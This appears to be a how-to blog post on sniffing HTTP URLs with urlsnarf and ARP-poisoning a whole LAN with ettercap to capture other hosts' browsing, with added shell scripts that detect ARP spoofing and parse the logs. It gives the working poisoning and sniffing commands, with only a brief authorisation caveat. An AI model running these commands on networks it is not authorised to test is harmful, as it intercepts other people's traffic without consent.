Categories
How-To Technical

ettercap and urlsnarf fun

Playing around, I installed the dsniff package (apt-get install dsniff) to get a bunch of tools. One of them is urlsnarf, which sniffs HTTP traffic and prints every requested URL in CLF (Common Log Format), the log format used by almost all web servers.

You start it by typing the following (as root, since capturing from the interface needs raw socket access):

urlsnarf -i eth0
urlsnarf: listening on eth0 [tcp port 80 or port 8080 or port 3128]

As HTTP traffic on those ports starts to come in, you see lines such as this:

- [18/Oct/2012:00:27:13 -0400] "GET http://www.jermsmit.com/?paged=2 HTTP/1.1" - - "http://www.jermsmit.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"

But now I want to see what others are doing on my network. This is done with the help of ettercap. If you do not have it, apt-get install ettercap will download and install it (on current Debian and Ubuntu the package is named ettercap-text-only or ettercap-graphical).

We keep our urlsnarf running and, in a second terminal, run the following command:

ettercap -T -Q -M arp -i eth0 // //

This ARP-poisons the entire segment: -T runs ettercap in text mode, -Q (super quiet) keeps it from dumping packet contents to the terminal, -M arp selects the ARP man-in-the-middle, and the two empty targets // // mean every host is poisoned against every other host, so their traffic passes through your machine before ettercap forwards it on. urlsnarf now shows the same kind of lines as above, but for other hosts' requests. A few things to keep in mind: only do this on a network you own or are authorised to test, since you are rewriting the ARP cache of every host on it; let ettercap exit cleanly (press q in text mode) so it can re-ARP the hosts, otherwise they lose connectivity until their caches expire; and urlsnarf only sees plaintext HTTP on ports 80, 8080 and 3128, so HTTPS requests never show up.
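The flip side of the attack above is spotting it from a victim. After ettercap poisons the segment, the attacker's MAC address answers for the gateway and for every other host, so a victim's neighbour table shows one MAC claimed by several IPs. The following is an added example (not from the original post or from ettercap) that looks for that symptom in the output of ip neigh show on Linux; the addresses and MACs in the sample table are constructed for illustration.

```shell
#!/bin/sh
# Added example: look for the symptom ettercap's ARP poisoning leaves on a
# victim. Real use: ip neigh show | flag_shared_macs
# The table below is constructed, not a real capture; it mimics the format of
# "ip neigh show" (Linux) with one MAC claiming three addresses.
SAMPLE_NEIGH='10.0.0.1 dev eth0 lladdr 00:0c:29:aa:bb:cc REACHABLE
10.0.0.7 dev eth0 lladdr 00:0c:29:aa:bb:cc STALE
10.0.0.9 dev eth0 lladdr 00:0c:29:aa:bb:cc REACHABLE
10.0.0.12 dev eth0 lladdr 3c:97:0e:11:22:33 REACHABLE
10.0.0.20 dev eth0 FAILED'

# Print "mac ip1 ip2 ..." for every MAC that appears under more than one IP.
# Entries without an lladdr (FAILED/INCOMPLETE) are skipped. A host with
# several addresses, or a VRRP pair, legitimately triggers this too, so treat
# a hit as something to investigate rather than proof of an attack.
flag_shared_macs() {
    awk '
    {
        mac = ""
        for (i = 1; i <= NF; i++) if ($i == "lladdr") mac = tolower($(i + 1))
        if (mac == "") next
        count[mac]++
        ips[mac] = ips[mac] " " $1
    }
    END {
        for (m in count) if (count[m] > 1) print m ips[m]
    }'
}

# Number of MACs claimed by more than one IP, handy as a cron job exit status
shared_mac_count() {
    flag_shared_macs | wc -l | tr -d " "
}

printf '%s\n' "$SAMPLE_NEIGH" | flag_shared_macs
```

Run against the constructed table it prints the one shared MAC followed by the three IPs it is answering for; on a clean segment it prints nothing.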

Now that is a lot of info, so we are going to trim it down to make it easier to read. This is done by piping urlsnarf into the cut command, like this:

urlsnarf -i eth0 | cut -d'"' -f4

What you get is one URL per line, such as http://www.mtv.com/. Note that the double quote has to be quoted for the shell, and that splitting the line on double quotes makes field 4 the Referer (the page the request was made from); the requested URL itself sits in field 2 as the request line, "GET http://... HTTP/1.1", so use -f2 if that is what you are after.
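Since cut on a single delimiter only gets you one whole field, here is an added example (not from the original post or from dsniff) that pulls the client, method, URL and Referer apart from urlsnarf's CLF lines with awk. The first log line is the one shown above with a constructed client address of 10.0.0.5 added; the second line is made up to show a POST with no Referer.

```shell
#!/bin/sh
# Added example: parse urlsnarf CLF lines with awk instead of a bare cut.
# Constructed sample input, not a real capture: the 10.0.0.5 client and the
# second line are made up for illustration.
SAMPLE_LOG='10.0.0.5 - - [18/Oct/2012:00:27:13 -0400] "GET http://www.jermsmit.com/?paged=2 HTTP/1.1" - - "http://www.jermsmit.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4"
10.0.0.7 - - [18/Oct/2012:00:28:01 -0400] "POST http://www.example.com/login HTTP/1.1" - - "-" "curl/7.26.0"'

# Split each line on the double quote: field 2 is the request line, field 4 the
# Referer, field 6 the User-Agent. The client address is the first word of field 1.
# Prints: client<TAB>method<TAB>url<TAB>referer
clf_requests() {
    awk -F'"' '
    {
        split($1, head, " ")            # head[1] is the client address
        split($2, req, " ")             # req[1] method, req[2] URL, req[3] version
        printf "%s\t%s\t%s\t%s\n", head[1], req[1], req[2], $4
    }'
}

# Only the requested URLs, one per line (what the cut in the post was after)
clf_urls() {
    awk -F'"' '{ split($2, req, " "); print req[2] }'
}

# Only the Referer values: this is what cut -d'"' -f4 actually prints
clf_referers() {
    cut -d'"' -f4
}

printf '%s\n' "$SAMPLE_LOG" | clf_requests
```

In practice you would replace the printf with the live pipe, urlsnarf -i eth0 | clf_urls, and keep the functions in your shell profile.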

So to sum up my steps:

  • urlsnarf -i eth0 (or: urlsnarf -i eth0 | cut -d'"' -f4)
  • ettercap -T -Q -M arp -i eth0 // //

And that is about it. Have fun!